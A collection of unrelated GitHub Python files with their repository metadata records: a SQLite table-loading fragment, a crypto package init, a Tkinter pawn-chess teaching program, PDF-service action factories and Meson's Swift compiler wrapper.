cur = con.cursor()
auto_close = False
else:
con = sqlite.connect(dbfile, isolation_level="DEFERRED")
cur = con.cursor()
auto_close = True
# read table from file
if not isinstance(tab, Table):
filename = tab
tab = Table()
it = tab.read_iter(filename)
try:
# force a reading of the headers
row = it.next()
rows = chain([row], it)
except StopIteration:
rows = []
pass
else:
rows = tab
if create:
sql_create_table(cur, table_name, tab, overwrite=overwrite)
# determine text columns
def issubclass2(t1, t2):
if type(t1) != type:
return False
return issubclass(t1, t2)
text = set()
for header in tab.headers:
t = tab.types[header]
if issubclass2(t, basestring) or not (
issubclass2(t, int) or
issubclass2(t, float) or
issubclass2(t, bool)):
text.add(header)
# insert rows
for row in rows:
vals = []
for header in tab.headers:
if header in text:
vals.append('"%s"' % row[header])
else:
vals.append(tab.types[header].__str__(row[header]))
vals = ",".join(vals)
cur.execute("INSERT INTO %s VALUES (%s);" % (table_name, vals))
con.commit()
if auto_close:
con.close()
#===========================================================================
# Matrix functions
def matrix2table(mat, rlabels=None, clabels=None, rowheader="rlabels"):
"""
convert a matrix into a table
use table.get_matrix() to convert back to a matrix
"""
if clabels is None:
clabels = range(len(mat[0]))
nheaders = 0
else:
nheaders = 1
if rlabels is None:
tab = Table(headers=clabels)
else:
tab = Table(headers=[rowheader] + clabels)
tab.nheaders = nheaders
for i, row in enumerate(mat):
if rlabels is not None:
row2 = {rowheader: rlabels[i]}
else:
row2 = {}
for j in xrange(len(mat[i])):
row2[clabels[j]] = mat[i][j]
tab.append(row2)
return tab
def write_matrix(filename, mat, rlabels=None, clabels=None,
rowheader="rlabels"):
tab = matrix2table(mat,
rlabels=rlabels,
clabels=clabels,
rowheader=rowheader)
tab.write(filename)
def read_matrix(filename, rowheader="rlabels"):
tab = read_table(filename)
mat, rlabels, clabels = tab.get_matrix(rowheader=rowheader)
return mat, rlabels, clabels
| {
"content_hash": "f6d0374ea355b332c379a29608889171",
"timestamp": "",
"source": "github",
"line_count": 1150,
"max_line_length": 89,
"avg_line_length": 27.74086956521739,
"alnum_prop": 0.5118174409127955,
"repo_name": "wutron/compbio",
"id": "b9aca5f81862f0a39205b2c16fed2c2253e311cb",
"size": "31902",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rasmus/tablelib.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "263"
},
{
"name": "Python",
"bytes": "1481466"
},
{
"name": "Shell",
"bytes": "592"
}
],
"symlink_target": ""
} |
"""Cryptographic protocols
Implements various cryptographic protocols. (Don't expect to find
network protocols here.)
Crypto.Protocol.KDF
A collection of standard key derivation functions.
Crypto.Protocol.SecretSharing
Distribute a secret amongst a group of participants.
"""
__all__ = ['KDF', 'SecretSharing']
| {
"content_hash": "f755c29fce9ce615177862a98b25c3eb",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 66,
"avg_line_length": 24.46153846153846,
"alnum_prop": 0.7767295597484277,
"repo_name": "marcuskelly/recover",
"id": "6a538ce31fc83ff427f84c9f9f230c729b2cfe04",
"size": "1831",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "Lib/site-packages/Crypto/Protocol/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1242"
},
{
"name": "C",
"bytes": "443857"
},
{
"name": "C++",
"bytes": "134770"
},
{
"name": "CSS",
"bytes": "21746"
},
{
"name": "HTML",
"bytes": "47112"
},
{
"name": "JavaScript",
"bytes": "29289"
},
{
"name": "Mako",
"bytes": "9381"
},
{
"name": "PowerShell",
"bytes": "8175"
},
{
"name": "Python",
"bytes": "16837827"
},
{
"name": "Shell",
"bytes": "2069"
},
{
"name": "Tcl",
"bytes": "1285363"
}
],
"symlink_target": ""
} |
import random
print(random.randint(0,99))
| {
"content_hash": "6b565773b4923b109d7c762c8ffe953d",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 27,
"avg_line_length": 14.333333333333334,
"alnum_prop": 0.7674418604651163,
"repo_name": "WebClub-NITK/Hacktoberfest-2k17",
"id": "2af8a1b6074a1cfd3a560d92a3197b2656a1488c",
"size": "43",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "Hello_World/Hello-World-Python/pankaj.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "41"
},
{
"name": "C",
"bytes": "111323"
},
{
"name": "C#",
"bytes": "845"
},
{
"name": "C++",
"bytes": "25563"
},
{
"name": "CSS",
"bytes": "1069"
},
{
"name": "Go",
"bytes": "359"
},
{
"name": "HTML",
"bytes": "32484"
},
{
"name": "Java",
"bytes": "20074"
},
{
"name": "JavaScript",
"bytes": "2713"
},
{
"name": "Lua",
"bytes": "394"
},
{
"name": "PHP",
"bytes": "1042"
},
{
"name": "Pascal",
"bytes": "235"
},
{
"name": "Perl",
"bytes": "579"
},
{
"name": "Python",
"bytes": "32114"
},
{
"name": "Ruby",
"bytes": "60"
},
{
"name": "VHDL",
"bytes": "1542"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/lair/falumpaset/shared_lair_falumpaset_forest.iff"
result.attribute_template_id = -1
result.stfName("lair_n","falumpaset_forest")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "cf8d8efad0d33edbd7818b76c1854a20",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 86,
"avg_line_length": 24.692307692307693,
"alnum_prop": 0.7071651090342679,
"repo_name": "obi-two/Rebelion",
"id": "0a2ce3018e9d234032163e00458ec84756f15218",
"size": "466",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/tangible/lair/falumpaset/shared_lair_falumpaset_forest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
'''
Based on
Representing a chess set in Python
Part 2
Brendan Scott
https://python4kids.brendanscott.com/2013/04/28/a-different-view-on-our-chess-model/
'''
import Tkinter as tk
from Tkinter import PhotoImage
import os.path
import os
# column_reference = "1 2 3 4 5 6 7 8".split(" ")
column_reference = "a b c d e f g h".split(" ")
EMPTY_SQUARE = " "
TILE_WIDTH = 60
'''We have used a tile width of 60 because the images we are used are 60x60 pixels
The original svg files were obtained from
http://commons.wikimedia.org/wiki/Category:SVG_chess_pieces/Standard_transparent
after downloading they were batch converted to png, then gif files. Bash one liners
to do this:
for i in $(ls *.svg); do inkscape -e ${i%.svg}.png -w 60 -h 60 $i ; done
for i in $(ls *.png); do convert $i ${i%.png}.gif ; done
white and black tiles were created in inkscape
'''
BOARD_WIDTH = 8 * TILE_WIDTH
BOARD_HEIGHT = BOARD_WIDTH
DATA_DIR = "chess_data"
TILES = {"black_tile": "black_tile.gif",
"p": "chess_p45.gif",
"P": "chess_p451.gif",
"white_tile": "white_tile.gif"
}
class Model(object):
def __init__(self):
'''create a chess board with pieces positioned for a new game
row ordering is reversed from normal chess representations
but corresponds to a top left screen coordinate
'''
self.board = []
pawn_base = "P " * 8
white_pawns = pawn_base.strip()
black_pawns = white_pawns.lower()
self.board.append([EMPTY_SQUARE] * 8)
self.board.append(black_pawns.split(" "))
for i in range(4):
self.board.append([EMPTY_SQUARE] * 8)
self.board.append(white_pawns.split(" "))
self.board.append([EMPTY_SQUARE] * 8)
def color(self, i, j):
''' checks the color of the piece located at the i, j coordinates
'''
color = -1 # 0 - white, 1 - black
if self.board[i][j] == 'p':
color = 1
elif self.board[i][j] == 'P':
color = 0
return color
def move(self, start, destination):
''' move a piece located at the start location to destination
(each an instance of BoardLocation)
Does not check whether the move is valid for the piece
'''
# check piece color
color = self.color(start.i, start.j)
print "Piece color: ", 'black' if color == 1 else ('white' if color == 0 else 'position empty')
print "start.j, %d, destination.j %d" % (start.j, destination.j)
print "start.i, %d, destination.i %d" % (start.i, destination.i)
print "---"
print self.board
print "---"
# ### error checking ### #
# check coordinates are valid
for c in [start, destination]:
if c.i > 7 or c.j > 7 or c.i < 0 or c.j < 0:
print 'err - coordinates are not valid (outside of board size)\n---'
return
# don't move to same location
if start.i == destination.i and start.j == destination.j:
print 'err - move to same location\n---'
return
# nothing to move
if self.board[start.i][start.j] == EMPTY_SQUARE:
print 'err - nothing to move\n---'
return
# don't move more than one step
# if at initial location don't move more than two steps
if color == 1 and start.i == 1 or color == 0 and start.i == 6:
if abs(destination.i - start.i) > 2 or abs(destination.j - start.j) > 1:
print 'err - more than two steps at init location\n---'
return
# don't move more than one step
elif abs(destination.i - start.i) > 1 or abs(destination.j - start.j) > 1:
print 'err - more than one step\n---'
return
# capture move
capture_color = self.color(destination.i, destination.j)
print 'capture color: ', capture_color
print '---'
#prevent capture of same color
if capture_color == color and (start.j - 1 == destination.j or start.j + 1 == destination.j):
print 'err - capture of same color\n---'
return
# prevent capture on an empty square
if capture_color != color and (start.j - 1 == destination.j or start.j + 1 == destination.j) \
and self.board[destination.i][destination.j] == EMPTY_SQUARE:
print 'err - capture of empty square\n---'
return
#prevent capture on walk (vertical)
if capture_color != color and capture_color != -1 and start.j == destination.j:
print 'err - capture on walk\n---'
return
# no retreat # and start.j == destination.j
#if start.i - 1 != destination.i and color == 0: #allows only one step
if start.i < destination.i and color == 0: # white goes up
print 'err - retreat attempt\n---'
return
#if start.i + 1 != destination.i and color == 1: #allows only one step
if start.i > destination.i and color == 1: # black goes down
print 'err - retreat attempt\n---'
return
f = self.board[start.i][start.j]
self.board[destination.i][destination.j] = f
self.board[start.i][start.j] = EMPTY_SQUARE
print '---\n'
class BoardLocation(object):
def __init__(self, i, j):
self.i = i
self.j = j
class View(tk.Frame):
def __init__(self, parent=None):
tk.Frame.__init__(self, parent)
# label = tk.Label(self, text="Error rate for a perceptron")
# label.pack(pady=10, padx=10)
label = tk.Button(self, text="Error ")
label.pack(pady=10, padx=10, side = tk.RIGHT)
self.canvas = tk.Canvas(self, width=BOARD_WIDTH, height=BOARD_HEIGHT)
self.canvas.pack()
self.images = {}
for image_file_name in TILES:
f = os.path.join(DATA_DIR, TILES[image_file_name])
if not os.path.exists(f):
print("Error: Cannot find image file: %s at %s - aborting" % (TILES[image_file_name], f))
exit(-1)
self.images[image_file_name] = PhotoImage(file=f)
'''This opens each of the image files, converts the data into a form that Tkinter
can use, then stores that converted form in the attribute self.images
self.images is a dictionary, keyed by the letters we used in our model to
represent the pieces - ie PRNBKQ for white and prnbkq for black
eg self.images['N'] is a PhotoImage of a white knight
this means we can directly translate a board entry from the model into a picture
'''
self.pack()
def clear_canvas(self):
''' delete everything from the canvas'''
items = self.canvas.find_all()
for i in items:
self.canvas.delete(i)
def draw_row(self, y, first_tile_white=True, debug_board=False):
''' draw a single row of alternating black and white tiles,
the colour of the first tile is determined by first_tile_white
if debug_board is set show the coordinates of each of the tile corners
'''
if first_tile_white:
remainder = 1
else:
remainder = 0
for i in range(8):
x = i * TILE_WIDTH
if i % 2 == remainder:
# i %2 is the remainder after dividing i by 2
# so i%2 will always be either 0 (no remainder- even numbers) or
# 1 (remainder 1 - odd numbers)
# this tests whether the number i is even or odd
tile = self.images['black_tile']
else:
tile = self.images['white_tile']
self.canvas.create_image(x, y, anchor=tk.NW, image=tile)
# NW is a constant in the Tkinter module. It stands for "north west"
# that is, the top left corner of the picture is to be located at x,y
# if we used another anchor, the grid would not line up properly with
# the canvas size
if debug_board: # implicitly this means if debug_board == True.
''' If we are drawing a debug board, draw an arrow showing top left
and its coordinates. '''
text_pos = (x + TILE_WIDTH / 2, y + TILE_WIDTH / 2)
line_end = (x + TILE_WIDTH / 4, y + TILE_WIDTH / 4)
self.canvas.create_line((x, y), line_end, arrow=tk.FIRST)
text_content = "(%s,%s)" % (x, y)
self.canvas.create_text(text_pos, text=text_content)
def draw_empty_board(self, debug_board=False):
''' draw an empty board on the canvas
if debug_board is set show the coordinates of each of the tile corners'''
y = 0
for i in range(8): # draw 8 rows
y = i * TILE_WIDTH
# each time, advance the y value at which the row is drawn
# by the length of the tile
first_tile_white = not (i % 2)
self.draw_row(y, first_tile_white, debug_board)
def draw_pieces(self, board):
for i, row in enumerate(board):
# using enumerate we get an integer index
# for each row which we can use to calculate y
# because rows run down the screen, they correspond to the y axis
# and the columns correspond to the x axis
for j, piece in enumerate(row):
if piece == EMPTY_SQUARE:
continue # skip empty tiles
tile = self.images[piece]
x = j * TILE_WIDTH
y = i * TILE_WIDTH
self.canvas.create_image(x, y, anchor=tk.NW, image=tile)
def display(self, board, debug_board=False):
''' draw an empty board then draw each of the
pieces in the board over the top'''
self.clear_canvas()
self.draw_empty_board(debug_board=debug_board)
if not debug_board:
self.draw_pieces(board)
# first draw the empty board
# then draw the pieces
# if the order was reversed, the board would be drawn over the pieces
# so we couldn't see them
def display_debug_board(self):
self.clear_canvas()
self.draw_empty_board()
class Controller(object):
def __init__(self, parent=None, model=None):
if model is None:
self.m = Model()
else:
self.m = model
self.v = View(parent)
''' we have created both a model and a view within the controller
the controller doesn't inherit from either model or view
'''
self.v.canvas.bind("<Button-1>", self.handle_click)
# this binds the handle_click method to the view's canvas for left button down
self.clickList = []
# I have kept clickList here, and not in the model, because it is a record of what is happening
# in the view (ie click events) rather than something that the model deals with (eg moves).
def run(self, debug_mode=False):
self.update_display(debug_board=debug_mode)
tk.mainloop()
def handle_click(self, event):
''' Handle a click received. The x,y location of the click on the canvas is at
(event.x, event.y)
First, we need to translate the event coordinates (ie the x,y of where the click occurred)
into a position on the chess board
add this to a list of clicked positions
every first click is treated as a "from" and every second click as a"to"
so, whenever there are an even number of clicks, use the most recent to two to perform a move
then update the display
'''
j = event.x / TILE_WIDTH
# the / operator is called integer division
# it returns the number of times TILE_WIDTH goes into event.x ignoring any remainder
# eg: 2/2 = 1, 3/2 = 1, 11/5 = 2 and so on
# so, it should return a number between 0 (if x < TILE_WIDTH) though to 7
i = event.y / TILE_WIDTH
self.clickList.append(BoardLocation(i, j))
# just maintain a list of all of the moves
# this list shouldn't be used to replay a series of moves because that is something
# which should be stored in the model - but it wouldn't be much trouble to
# keep a record of moves in the model.
if len(self.clickList) % 2 == 0:
# move complete, execute the move
self.m.move(self.clickList[-2], self.clickList[-1])
# use the second last entry in the clickList and the last entry in the clickList
self.update_display()
def update_display(self, debug_board=False):
self.v.display(self.m.board, debug_board=debug_board)
def parse_move(self, move):
''' Very basic move parsing
given a move in the form ab-cd where a and c are in [a,b,c,d,e,f,g,h]
and b and d are numbers from 1 to 8 convert into BoardLocation instances
for start (ab) and destination (cd)
Does not deal with castling (ie 0-0 or 0-0-0) or bare pawn moves (e4)
or capture d4xe5 etc
No error checking! very fragile
'''
s, d = move.split("-")
i = 8 - int(s[-1]) # board is "upside down" with reference to the representation
j = column_reference.index(s[0])
start = BoardLocation(i, j)
i = 8 - int(d[-1])
j = column_reference.index(d[0])
destination = BoardLocation(i, j)
return start, destination
if __name__ == "__main__":
if not os.path.exists(DATA_DIR):
''' basic check - if there are files missing from the data directory, the
program will still fail '''
dl = raw_input("Cannot find chess images directory. Download from website? (Y/n)")
if dl.lower() == "n":
print("No image files found, quitting.")
exit(0)
print("Creating directory: %s" % os.path.join(os.getcwd(), DATA_DIR))
import urllib
os.mkdir(DATA_DIR)
url_format = "https://python4kids.files.wordpress.com/2013/04/%s"
for k, v in TILES.items():
url = url_format % v
target_filename = os.path.join(DATA_DIR, v)
print("Downloading file: %s" % v)
urllib.urlretrieve(url, target_filename)
parent = tk.Tk()
c = Controller(parent)
c.run(debug_mode=False) | {
"content_hash": "05a2ca464874cb9deecdc8ac81d72ab8",
"timestamp": "",
"source": "github",
"line_count": 368,
"max_line_length": 105,
"avg_line_length": 39.42934782608695,
"alnum_prop": 0.5809097174362509,
"repo_name": "xR86/ml-stuff",
"id": "df4ef9e2a50596a036499e2b8cfe901bd8c701a3",
"size": "14528",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "labs-AI/hw-lab5/pawn_chess.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2131"
},
{
"name": "Dockerfile",
"bytes": "49"
},
{
"name": "Jupyter Notebook",
"bytes": "84710241"
},
{
"name": "Makefile",
"bytes": "634"
},
{
"name": "Python",
"bytes": "128637"
},
{
"name": "Shell",
"bytes": "550"
},
{
"name": "TeX",
"bytes": "14991"
}
],
"symlink_target": ""
} |
"""
Documint action factories.
Each public function produces a `dict` suitable for passing to the
`perform_action` session method.
"""
def _action(name, params):
"""
Convenience function for constructing an action `dict`.
"""
return {u'action': name,
u'parameters': params}
def render_html(input, base_uri=None):
"""
Render an HTML document to a PDF document.
:param unicode input: URI to the HTML content to render.
:param base_uri: Optional base URI to use when resolving relative URIs.
:type base_uri: unicode or None
"""
def _parse_render(result):
return result[u'links'][u'result'][0]
params = {u'input': input}
if base_uri is not None:
params[u'base-uri'] = base_uri
return _action(u'render-html', params), _parse_render
def render_legacy_html(input, base_uri=None):
"""
Render a legacy HTML document to a PDF document.
:param unicode input: URI to the HTML content to render.
:param base_uri: Optional base URI to use when resolving relative URIs.
:type base_uri: unicode or None
"""
def _parse_render(result):
return result[u'links'][u'result'][0]
params = {u'input': input}
if base_uri is not None:
params[u'base-uri'] = base_uri
return _action(u'render-legacy-html', params), _parse_render
def concatenate(inputs):
"""
Concatenate several PDF documents together.
:param inputs: Document URIs.
:type inputs: list of unicode
"""
def _parse_concat(result):
return result[u'links'][u'result'][0]
return _action(u'concatenate',
{u'inputs': inputs}), _parse_concat
def thumbnails(input, dpi):
"""
Generate JPEG thumbnails for a PDF document.
:param unicode input: Document URI.
:param int dpi: Pixel density of the thumbnail.
"""
def _parse_thumbnails(result):
return result[u'links'][u'results']
return _action(u'thumbnails',
{u'input': input,
u'dpi': dpi}), _parse_thumbnails
def split(input, page_groups):
"""
Split a PDF document into multiple PDF documents.
:param unicode input: Document URI.
:param page-groups: Page number groups, each group of pages represents a
new document containing only those pages from the original document in the
order they are specified. For example ``[[1, 3, 2], [4, 2]]`` produces two
documents: one with pages 1, 3 and 2; the other with pages 4 and 2.
:type page-groups: list of lists of int
"""
def _parse_split(result):
return result[u'links'][u'results']
return _action(u'split',
{u'input': input,
u'page-groups': page_groups}), _parse_split
def metadata(input):
"""
Retrieve metadata from a PDF document.
:param unicode input: Document URI.
"""
def _parse_metadata(result):
return result[u'body']
return _action(u'metadata',
{u'input': input}), _parse_metadata
def sign(inputs, certificate_alias, location, reason):
"""
Digitally sign one or more PDF documents.
:param inputs: Document URIs.
:type inputs: list of unicode
:param unicode certificate_alias: Certificate alias, in the Documint
keystore, to use when signing the documents.
:param unicode location: Signing location.
:param unicode reason: Signing reason.
"""
def _parse_sign(result):
return result[u'links'][u'results']
return _action(u'sign',
{u'inputs': inputs,
u'certificate-alias': certificate_alias,
u'location': location,
u'reason': reason}), _parse_sign
def crush(input, compression_profile):
"""
Compress a PDF document according to a specific compression profile.
:param unicode input: Document URI.
:param unicode compression_profile: Compression profile to use, possible
choices are: ``text`` (bilevel), ``photo-grey`` (greyscale), ``photo``
(colour).
"""
def _parse_crush(result):
return result[u'links'][u'result'][0]
return _action(u'crush',
{u'input': input,
u'compression-profile': compression_profile}), _parse_crush
def stamp(watermark, inputs):
"""
Stamp documents with a watermark document.
:param unicode watermark: Watermark document URI.
:type input: ``List[unicode]``
:param input: Document URIs.
"""
def _parse_stamps(result):
return result[u'links'][u'results']
return _action(u'stamp',
{u'watermark': watermark,
u'inputs': inputs}), _parse_stamps
| {
"content_hash": "7ac0b3cbb61f9d1c8cf58f2797f1547d",
"timestamp": "",
"source": "github",
"line_count": 154,
"max_line_length": 79,
"avg_line_length": 30.636363636363637,
"alnum_prop": 0.622297583721916,
"repo_name": "fusionapp/txdocumint",
"id": "63770344f809e4772dd56f5beeb222b60c24bed8",
"size": "4718",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/txdocumint/actions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "126104"
}
],
"symlink_target": ""
} |
import subprocess, os.path
from ..mesonlib import EnvironmentException
from .compilers import Compiler, swift_buildtype_args, clike_debug_args
swift_optimization_args = {'0': [],
'g': [],
'1': ['-O'],
'2': ['-O'],
'3': ['-O'],
's': ['-O'],
}
class SwiftCompiler(Compiler):
def __init__(self, exelist, version):
self.language = 'swift'
super().__init__(exelist, version)
self.version = version
self.id = 'llvm'
self.is_cross = False
def get_linker_exelist(self):
return self.exelist[:]
def name_string(self):
return ' '.join(self.exelist)
def needs_static_linker(self):
return True
def get_werror_args(self):
return ['--fatal-warnings']
def get_dependency_gen_args(self, outtarget, outfile):
return ['-emit-dependencies']
def depfile_for_object(self, objfile):
return os.path.splitext(objfile)[0] + '.' + self.get_depfile_suffix()
def get_depfile_suffix(self):
return 'd'
def get_output_args(self, target):
return ['-o', target]
def get_linker_output_args(self, target):
return ['-o', target]
def get_header_import_args(self, headername):
return ['-import-objc-header', headername]
def get_warn_args(self, level):
return []
def get_buildtype_args(self, buildtype):
return swift_buildtype_args[buildtype]
def get_buildtype_linker_args(self, buildtype):
return []
def get_std_exe_link_args(self):
return ['-emit-executable']
def get_module_args(self, modname):
return ['-module-name', modname]
def get_mod_gen_args(self):
return ['-emit-module']
def build_rpath_args(self, *args):
return [] # FIXME
def get_include_args(self, dirname):
return ['-I' + dirname]
def get_compile_only_args(self):
return ['-c']
def sanity_check(self, work_dir, environment):
src = 'swifttest.swift'
source_name = os.path.join(work_dir, src)
output_name = os.path.join(work_dir, 'swifttest')
with open(source_name, 'w') as ofile:
ofile.write('''print("Swift compilation is working.")
''')
extra_flags = self.get_cross_extra_flags(environment, link=True)
pc = subprocess.Popen(self.exelist + extra_flags + ['-emit-executable', '-o', output_name, src], cwd=work_dir)
pc.wait()
if pc.returncode != 0:
raise EnvironmentException('Swift compiler %s can not compile programs.' % self.name_string())
if subprocess.call(output_name) != 0:
raise EnvironmentException('Executables created by Swift compiler %s are not runnable.' % self.name_string())
def get_debug_args(self, is_debug):
return clike_debug_args[is_debug]
def get_optimization_args(self, optimization_level):
return swift_optimization_args[optimization_level]
| {
"content_hash": "651d5a467850ce005d26655284c3807e",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 121,
"avg_line_length": 31.171717171717173,
"alnum_prop": 0.5832793259883344,
"repo_name": "MathieuDuponchelle/meson",
"id": "4d5dd0cfe2992251ee850d0b4c8f6e7f4eb9fa0a",
"size": "3679",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mesonbuild/compilers/swift.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "4190"
},
{
"name": "Batchfile",
"bytes": "868"
},
{
"name": "C",
"bytes": "146965"
},
{
"name": "C#",
"bytes": "949"
},
{
"name": "C++",
"bytes": "27342"
},
{
"name": "CMake",
"bytes": "1780"
},
{
"name": "D",
"bytes": "5077"
},
{
"name": "Dockerfile",
"bytes": "957"
},
{
"name": "Emacs Lisp",
"bytes": "919"
},
{
"name": "Fortran",
"bytes": "4590"
},
{
"name": "Genie",
"bytes": "341"
},
{
"name": "Inno Setup",
"bytes": "354"
},
{
"name": "Java",
"bytes": "2570"
},
{
"name": "JavaScript",
"bytes": "136"
},
{
"name": "LLVM",
"bytes": "75"
},
{
"name": "Lex",
"bytes": "135"
},
{
"name": "Meson",
"bytes": "341983"
},
{
"name": "Objective-C",
"bytes": "1092"
},
{
"name": "Objective-C++",
"bytes": "332"
},
{
"name": "PowerShell",
"bytes": "2249"
},
{
"name": "Python",
"bytes": "1964481"
},
{
"name": "Roff",
"bytes": "301"
},
{
"name": "Rust",
"bytes": "1079"
},
{
"name": "Shell",
"bytes": "2083"
},
{
"name": "Swift",
"bytes": "1152"
},
{
"name": "Vala",
"bytes": "10025"
},
{
"name": "Verilog",
"bytes": "709"
},
{
"name": "Vim script",
"bytes": "9480"
},
{
"name": "Yacc",
"bytes": "50"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.